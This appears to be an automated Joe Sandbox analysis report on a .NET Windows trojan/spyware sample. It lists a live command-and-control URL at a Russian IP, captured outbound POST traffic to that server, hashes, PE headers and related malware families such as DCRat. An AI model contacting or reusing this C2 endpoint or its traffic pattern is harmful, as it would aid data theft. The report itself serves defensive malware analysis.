https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	jXzXDduVeIqOfFYGnN.exe, 00000006.00000002.3379108765.0000000014173000.00000004.00000800.00020000.00000000.sdmp, jXzXDduVeIqOfFYGnN.exe, 00000006.00000002.3379108765.0000000013A3A000.00000004.00000800.00020000.00000000.sdmp, m5CQtFa1lB.6.dr, 9KQyCXcnas.6.dr, NLOI6GFheR.6.dr, Ycl0D2uj1l.6.dr, ottSjZVhx0.6.dr, H2Gsz3imko.6.dr, fvXjgBLX2v.6.dr, IP0a9GyNjH.6.dr, marwh0fSYn.6.dr, 6HkiYEDVc5.6.dr, myJCZW2R38.6.dr, LgoqXKAebd.6.dr, muN2cX4GEf.6.dr, N89GnkNZyQ.6.dr, DP4oxtj4vi.6.dr, gYvZxX8tbE.6.dr, nqOH3u032q.6.dr, 9upRu4MzDR.6.dr, WhVUM2lTDU.6.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	jXzXDduVeIqOfFYGnN.exe, 00000006.00000002.3379108765.0000000014173000.00000004.00000800.00020000.00000000.sdmp, jXzXDduVeIqOfFYGnN.exe, 00000006.00000002.3379108765.0000000013A3A000.00000004.00000800.00020000.00000000.sdmp, m5CQtFa1lB.6.dr, 9KQyCXcnas.6.dr, NLOI6GFheR.6.dr, Ycl0D2uj1l.6.dr, ottSjZVhx0.6.dr, H2Gsz3imko.6.dr, fvXjgBLX2v.6.dr, IP0a9GyNjH.6.dr, marwh0fSYn.6.dr, 6HkiYEDVc5.6.dr, myJCZW2R38.6.dr, LgoqXKAebd.6.dr, muN2cX4GEf.6.dr, N89GnkNZyQ.6.dr, DP4oxtj4vi.6.dr, gYvZxX8tbE.6.dr, nqOH3u032q.6.dr, 9upRu4MzDR.6.dr, WhVUM2lTDU.6.dr	false		high
http://193.124H	jXzXDduVeIqOfFYGnN.exe, 00000006.00000002.3368236613.0000000003673000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	jXzXDduVeIqOfFYGnN.exe, 00000006.00000002.3379108765.0000000014173000.00000004.00000800.00020000.00000000.sdmp, jXzXDduVeIqOfFYGnN.exe, 00000006.00000002.3379108765.0000000013A3A000.00000004.00000800.00020000.00000000.sdmp, m5CQtFa1lB.6.dr, 9KQyCXcnas.6.dr, NLOI6GFheR.6.dr, Ycl0D2uj1l.6.dr, ottSjZVhx0.6.dr, H2Gsz3imko.6.dr, fvXjgBLX2v.6.dr, IP0a9GyNjH.6.dr, marwh0fSYn.6.dr, 6HkiYEDVc5.6.dr, myJCZW2R38.6.dr, LgoqXKAebd.6.dr, muN2cX4GEf.6.dr, N89GnkNZyQ.6.dr, DP4oxtj4vi.6.dr, gYvZxX8tbE.6.dr, nqOH3u032q.6.dr, 9upRu4MzDR.6.dr, WhVUM2lTDU.6.dr	false		high
https://www.ecosia.org/newtab/	jXzXDduVeIqOfFYGnN.exe, 00000006.00000002.3379108765.0000000014173000.00000004.00000800.00020000.00000000.sdmp, jXzXDduVeIqOfFYGnN.exe, 00000006.00000002.3379108765.0000000013A3A000.00000004.00000800.00020000.00000000.sdmp, m5CQtFa1lB.6.dr, 9KQyCXcnas.6.dr, NLOI6GFheR.6.dr, Ycl0D2uj1l.6.dr, ottSjZVhx0.6.dr, H2Gsz3imko.6.dr, fvXjgBLX2v.6.dr, IP0a9GyNjH.6.dr, marwh0fSYn.6.dr, 6HkiYEDVc5.6.dr, myJCZW2R38.6.dr, LgoqXKAebd.6.dr, muN2cX4GEf.6.dr, N89GnkNZyQ.6.dr, DP4oxtj4vi.6.dr, gYvZxX8tbE.6.dr, nqOH3u032q.6.dr, 9upRu4MzDR.6.dr, WhVUM2lTDU.6.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	DWTukBG9R7.exe, 00000000.00000002.2144864068.0000000003A08000.00000004.00000800.00020000.00000000.sdmp, jXzXDduVeIqOfFYGnN.exe, 00000006.00000002.3368236613.00000000031C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	jXzXDduVeIqOfFYGnN.exe, 00000006.00000002.3379108765.0000000014173000.00000004.00000800.00020000.00000000.sdmp, jXzXDduVeIqOfFYGnN.exe, 00000006.00000002.3379108765.0000000013A3A000.00000004.00000800.00020000.00000000.sdmp, m5CQtFa1lB.6.dr, 9KQyCXcnas.6.dr, NLOI6GFheR.6.dr, Ycl0D2uj1l.6.dr, ottSjZVhx0.6.dr, H2Gsz3imko.6.dr, fvXjgBLX2v.6.dr, IP0a9GyNjH.6.dr, marwh0fSYn.6.dr, 6HkiYEDVc5.6.dr, myJCZW2R38.6.dr, LgoqXKAebd.6.dr, muN2cX4GEf.6.dr, N89GnkNZyQ.6.dr, DP4oxtj4vi.6.dr, gYvZxX8tbE.6.dr, nqOH3u032q.6.dr, 9upRu4MzDR.6.dr, WhVUM2lTDU.6.dr	false		high
http://193.124.185.16/gameBigloadHttp/apidumpjavascript/5game/Process/	jXzXDduVeIqOfFYGnN.exe, 00000006.00000002.3368236613.000000000309B000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.124.185.16	unknown	Russian Federation		35196	IHOR-ASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576010
Start date and time:	2024-12-16 13:11:18 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DWTukBG9R7.exe renamed because original name is a hash value
Original Sample Name:	15536627ef85575e9dfa2f91d54b24dd.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@10/292@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56, 23.218.208.109
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: DWTukBG9R7.exe

Simulations

Behavior and APIs

Time	Type	Description
07:12:43	API Interceptor	577882x Sleep call for process: jXzXDduVeIqOfFYGnN.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
IHOR-ASRU	rrats.exe	Get hash	malicious	AsyncRAT	Browse	194.67.204.7
	http://comprehend-girls.ru/uk_razn_html	Get hash	malicious	Porn Scam	Browse	93.170.123.244
	SecuriteInfo.com.Trojan.Encoder.3976.32157.17259.exe	Get hash	malicious	Locky	Browse	93.170.123.219
	KKdMgqLFjC.msi	Get hash	malicious	Matanbuchus	Browse	194.67.193.73
	fBcMVl6ns6.lnk	Get hash	malicious	RHADAMANTHYS	Browse	185.58.206.164
	rpQF1aDIK4.lnk	Get hash	malicious	RHADAMANTHYS	Browse	185.58.206.164
	test.ps1	Get hash	malicious	RHADAMANTHYS	Browse	185.58.206.164
	path.ps1	Get hash	malicious	DcRat	Browse	185.58.206.164
	81zBpBAWwc.exe	Get hash	malicious	RHADAMANTHYS	Browse	185.58.206.164
	useraccount.aspx.dll	Get hash	malicious	Matanbuchus	Browse	194.67.193.13

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\CKvNPuCt.log	150bIjWiGH.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	wmdqEYgW2i.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	CPNSQusnwC.exe	Get hash	malicious	DCRat	Browse
	xoCq1tvPcm.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	eu6OEBpBCI.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	IYXE4Uz61k.exe	Get hash	malicious	DCRat, PureLog Stealer, Xmrig, zgRAT	Browse
	file.exe	Get hash	malicious	Amadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, Vidar	Browse
	gorkmTnChA.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	A5EbyKyjhV.exe	Get hash	malicious	DCRat	Browse
	qNdO4D18CF.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Process:	C:\Users\user\Desktop\DWTukBG9R7.exe
File Type:	ASCII text, with very long lines (940), with no line terminators
Category:	dropped
Size (bytes):	940
Entropy (8bit):	5.912522728721821
Encrypted:	false
SSDEEP:	24:Hj0NneUqWFKc6O5P9rqDeoaSI8O1hUCXydas1UTmqfDV5Nv:Hj0/qWFKEoLIV12QqLsJr
MD5:	C82502A2CEBF2DDA73A23457CD3F0C12
SHA1:	C66E7D80C361EBA7739B78534A2F30653C836BDE
SHA-256:	823B0CCCF25B1BF2A840226A4F7543E42F2DB52250EBC04355C54D113B15F00F
SHA-512:	6C5D5AE5D1332C266531491E37637B65B4276E9F3E60509C8CA198D16983F2D2D3F87B7460E6FEE969D0A4F42D813D25E0A374C69E797B21EC8F0B949B6BB989
Malicious:	false
Reputation:	low
Preview:	wpK675TWmnXnB34BmOQwMzY1qlHHOdwmoz1PFY5iUk8pV2WkxMESl4t7RTPWyLHJ1u9MBo6NSrcm0sfxOgUCZeBtF48wJiuIczyk3JjIP193cGGjybHR1FtXtPGHqKEt6TKB444F7LwheIR9xZ7rbdRXFb1oCccFxP6I6Fp3hCTpSM2k7HTRMXSdCw5cCPCftquOLJCruEJYJlE3jRq5IK3a6dFJKM1RAy6lbnYyFmhIN4TbsC3ujGXjxUSsD2hhM2XVpcb521zfmvMCJobHSGs3bXyHVpvMEA5Vg8vQk71rR16BHPjYbZOFJe4RnUkNGnbmz1fL2LgVPAmjaw9FGWvov0LCDemQXoloaUMPtYgQ330I1U10UeHt1w09qdHYiQ7kZ8JFktVr0fv1ACKsmv52h1wodMjQQHrm6Ps3LvQlIZ3WA88nTYvxUEDiLflXJFatxI5uUQg1fUtH8anfO661V4S1MKrqJ2bD8Ki1COTC24RAU6kv1GJMIjX30EiJjzrn3qIy1vc9n49amShPk6zDsO4ZwpB8pJdCNoHnxw4GnKjOj7RigSjmAn4ovtBMudTea7M7K3cyBsZipq0zYccXk0Bjuc2EurVK0FxmuTXn0vlROW9F3MyRB64j5nMsBYDTWPsk2NFEEygyPuVYdwKh3EI3KOqHGpmcrR49nZNpHtNMZFULSyPONfaSGyZoh87ZMEH8zVuEjfaK15dF3ezSaXOL1l2zAjHJwxAV7VW6EKprFPbLUTuCJp9zz6HNc4E9YRXD5IHhI2OPrhFlKreqyF9GyLfBOIdJGpTx2XQMLM3QbtHS0gDvaXKTRRPtnGTAZEIBOStwbSemLtpEDMKsFrttfAflIgjF231WlGEixQUH2iHilKqa5l4rVZgNwHn5tZtR2Td7Im5yXl062798zIJR8JALj0vpmYXdy0pS

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.618543484589417
Encrypted:	false
SSDEEP:	12:Pp5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:rdUOAokItULVDv
MD5:	1111FE8E3F5AF574FABA8BC5B610148D
SHA1:	97F131559F13C4A151D97F23065EE6E10E8F63F5
SHA-256:	15300385CB48B1F8DA78180F2F772A2F89872019F54E9FFDBBE5FA188E1155EA
SHA-512:	71163771D36565FA7E20D5391C6B8A71AC1F0779EF494709C49CFF8FFD182C6F10557E8E83889DC5EDD3F146B88E3E0AC0FCEF066B487F65E287B250A0B682BA
Malicious:	false
Preview:	..Pinging 971342 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.725753306549117
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	DWTukBG9R7.exe
File size:	2'742'784 bytes
MD5:	15536627ef85575e9dfa2f91d54b24dd
SHA1:	2c498ffe7cb1a53cce6155ac50b19b2a1b437b2d
SHA256:	7c80ac7694d0009df4cb82d8fa843910cf07a53d24916daf5dbb9e09a1512881
SHA512:	c4f489f26bb2b7517e0a6f12836ba18beac2b33e2b7f63903f5a95ba10feedf8711caa68b3e8f5512ed9bb211d8c09cb8f9c4d3c400f64c2da493c9722aa8b5e
SSDEEP:	49152:UtTBxlAaunGEw1jCZu4uQNOeh6/RrcCAEreN1s+WU8E+R:UttxanEdC0haOeh6/RrpDeN138E+R
TLSH:	C6C5E18695624E33C264BF3598E7102E42B8DA667513EF1B362F21D1FC062769F172B3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................).........~.).. .......@.. .......................@...........@................................

Entrypoint:	0x69f07e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x29f030	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2a0000	0x370	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2a2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x29d084	0x29d200	fdc4bf13aa9c62db5c1c8d661bd77f97	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x2a0000	0x370	0x400	a27edcaa2a23be5882eb0f42591f885e	False	0.3759765625	data	2.856785757722979	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x2a2000	0xc	0x200	076c91f60791fe2afec6d4b8492a9217	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:12:33.589584112 CET	314	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 16, 2024 13:12:33.952838898 CET	344	OUT	Data Raw: 00 0b 01 00 06 01 01 06 05 06 02 01 02 02 01 05 00 04 05 0f 02 0d 03 09 01 07 0f 54 03 0e 06 06 0f 55 03 00 03 54 04 07 0e 56 07 51 05 07 06 56 07 04 0c 01 0a 07 05 03 06 54 03 06 04 0b 00 0b 02 06 0e 0c 05 03 04 05 0b 05 0d 06 0c 07 0b 07 05 02 Data Ascii: TUTVQVTS\L~Ah`__cbb_but~l}tRl\|s]YxBUE{^r\|ClAt\|Li_~V@{STbu
Dec 16, 2024 13:12:43.813642979 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:12:43.994621992 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:12:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 35 37 38 0d 0a 56 4a 7e 4c 7b 54 7f 02 7b 4c 74 05 7c 71 60 5e 7c 74 67 41 68 60 62 54 7a 73 5a 06 6a 5b 64 03 74 05 79 0b 6e 72 7a 5f 62 66 59 58 7d 71 78 01 55 4b 71 4f 77 72 73 4b 7c 71 7d 42 7d 77 69 50 6c 76 60 41 7d 60 7b 03 75 72 69 03 74 61 75 48 68 58 66 04 7e 7c 70 09 7e 67 70 59 76 4c 7b 06 7c 5b 61 01 7c 73 75 02 78 67 6c 04 6c 77 78 4f 7b 43 59 49 78 72 7c 49 6c 63 75 5e 68 70 52 06 78 74 60 49 7d 4c 6c 5a 61 5f 74 04 7a 51 41 5b 7f 64 7b 55 7f 61 5f 0c 77 6c 78 4c 6c 55 7f 59 60 5e 71 51 6d 5f 5c 5c 7e 42 66 04 6c 61 75 58 62 70 60 5f 62 71 70 41 63 61 50 50 7e 5d 7a 06 63 5c 6e 5d 76 66 7f 50 7e 7f 75 01 60 6f 63 5d 7f 05 7c 03 78 6f 73 03 6f 73 76 00 6b 6d 6c 08 77 49 6c 07 7e 62 66 09 7e 6d 6f 09 7b 7d 5f 5b 69 04 69 04 7b 5d 46 51 7c 7c 5e 0c 69 06 64 0c 6a 49 53 5f 78 6d 5a 5f 7b 72 68 03 7f 58 67 01 7e 01 63 0a 7f 60 66 52 6d 5a 73 59 7e 5b 7b 58 77 73 61 51 7b 5c 79 03 75 48 7c 4a 7d 48 64 06 7f 66 6d 42 74 62 6b 06 7c 62 65 04 7c 49 58 09 79 76 68 09 7c 63 63 4a 75 4c 53 03 77 [TRUNCATED] Data Ascii: 578VJ~L{T{Lt\|q`^\|tgAh`bTzsZj[dtynrz_bfYX}qxUKqOwrsK\|q}B}wiPlv`A}`{uritauHhXf~\|p~gpYvL{\|[a\|suxgllwxO{CYIxr\|Ilcu^hpRxt`I}LlZa_tzQA[d{Ua_wlxLlUY`^qQm_\\~BflauXbp`_bqpAcaPP~]zc\n]vfP~u`oc]\|xososvkmlwIl~bf~mo{}_[ii{]FQ\|\|^idjIS_xmZ_{rhXg~c`fRmZsY~[{XwsaQ{\yuH\|J}HdfmBtbk\|be\|IXyvh\|ccJuLSwOm~ar}RdC~gsKwaYzbiG~^[ygZCxIxx}sKzLpH{]\}pRK{IRJ\|r{Mwqd}lQE\|Y`_mu\|pL{\|hFw^Pz_m~RbOx_bHu]svalwqPpbw\uMuux\|lStRp~c\|{RoE{NfI\|Cxtw\|L}bb~}OxmT}LuO}`p\|lxpZ~gzN{}U{\\|F\|_s}Iopa@zcZbpIw]}zqaJvHp}Xp}HawbwI\}}gf{X\|~sUvLmNwq[~qzH}\|tggwqgIxbaH\|p[I{gZNxYp{CUHzblxcv{]NZodp}rQbagYio\|Z\|dh}avTwo]z\|pvpnyqn]~Uz_z\y\}b`g{ZL~JxYbMc\aufpBk\|b_tY\|ssX{{o^WXh}cTtds\}bz@zSYQoa_jnzBkcIrPoWjbTjaMolV[TagFRXidx`l~VZw[ja]ZZvVzk[qxAzXU]iebU`{}b[k^boflA~]cuLatnZh~I~RcQyYBqXV\WzCWc\CT_Mlkla\|~\ZXzt\|]K{YxF~bQq\BYi`DQtIhXL`wFQpZXv]}vnmWWdoOTLzBqZR_ZwE]bSISXNca\EZQ~Qzzc`ZRf`JWAA\|YW_P{J]d]FRZAinRHW [TRUNCATED]
Dec 16, 2024 13:12:43.994720936 CET	362	IN	Data Raw: 59 76 4c 6e 64 70 03 79 5d 00 5d 5d 4e 72 62 56 06 7a 41 71 5b 46 5b 69 00 67 41 53 75 40 09 63 04 5e 46 6a 04 7e 43 56 64 06 09 55 5c 55 7c 51 05 60 5c 71 5c 57 5f 6f 63 75 59 7d 76 79 5f 6a 6f 0c 4e 52 7b 64 5d 59 62 07 56 6c 04 01 01 51 5a 6a Data Ascii: YvLndpy]]]NrbVzAq[F[igASu@c^Fj~CVdU\U\|Q`\q\W_ocuY}vy_joNR{d]YbVlQZjJSf\Tdl\yPxgU[Yo`fQgk[RtcIz_A^bcFPNh]MjzOZVkFWUgD]qyOnraY\|QyydfzBqZR_ZwE]bSISX][YfTSVbz`oYx]VZbUKQsTTcnUZ^U\ie~KzTRTWuETaTGPXKk`kIT\|gSi`~\|ScD
Dec 16, 2024 13:12:44.526798010 CET	290	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 384 Expect: 100-continue
Dec 16, 2024 13:12:44.885859966 CET	384	OUT	Data Raw: 54 57 59 56 5f 5a 54 5e 58 59 51 57 59 52 54 5b 59 5c 59 49 56 5b 5a 5c 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: TWYV_ZT^XYQWYRT[Y\YIV[Z\T_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y!+;6%#%1[(55)Z';#V>B#^!/%?$?&28>%G!"Z*
Dec 16, 2024 13:12:44.912945032 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:12:45.310399055 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:12:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 02 1f 23 51 35 39 2a 58 26 13 2f 56 30 3e 36 5a 24 06 0e 18 3f 3e 33 00 3e 3e 15 16 3d 3c 37 5e 33 06 37 1b 3d 07 39 13 3f 3c 2c 13 29 31 2a 58 02 12 25 00 3d 32 28 0e 2c 3d 39 0d 29 2e 3a 1a 37 06 2f 58 24 3d 33 1b 25 03 25 5c 20 07 0b 53 3c 17 02 1f 29 2f 2d 05 29 3d 33 11 29 3e 21 50 08 11 26 08 3f 3c 2c 0c 28 23 05 12 21 23 30 5a 27 2a 3c 0a 27 0d 37 0d 31 02 05 5a 3e 32 3b 59 3e 00 04 13 3a 07 03 00 36 0f 21 51 2a 38 2e 51 23 0a 29 51 05 34 5c 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98#Q59X&/V0>6Z$?>3>>=<7^37=9?<,)1X%=2(,=9).:7/X$=3%%\ S<)/-)=3)>!P&?<,(#!#0Z'<'71Z>2;Y>:6!Q8.Q#)Q4\Q0
Dec 16, 2024 13:12:45.310854912 CET	291	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1096 Expect: 100-continue
Dec 16, 2024 13:12:45.667237997 CET	1096	OUT	Data Raw: 54 56 5c 50 5a 5b 54 5d 58 59 51 57 59 5c 54 51 59 54 59 48 56 5f 5a 58 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: TV\PZ[T]XYQWY\TQYTYHV_ZXT_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y!);.Y&9#!^)&36.0=77!?"+$$&0>,%G!"Z>
Dec 16, 2024 13:12:45.697742939 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:12:46.122059107 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:12:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 57 5a 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 40WZX0
Dec 16, 2024 13:12:46.122596025 CET	291	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1376 Expect: 100-continue
Dec 16, 2024 13:12:46.479453087 CET	1376	OUT	Data Raw: 51 53 5c 50 5a 5f 54 5c 58 59 51 57 59 53 54 5c 59 59 59 42 56 51 5a 5f 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: QS\PZ_T\XYQWYST\YYYBVQZ_T_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y!Z)^%&!6)X>&(W6%_'<B4!?((1" W<%G!"Z*
Dec 16, 2024 13:12:46.509311914 CET	25	IN	HTTP/1.1 100 Continue
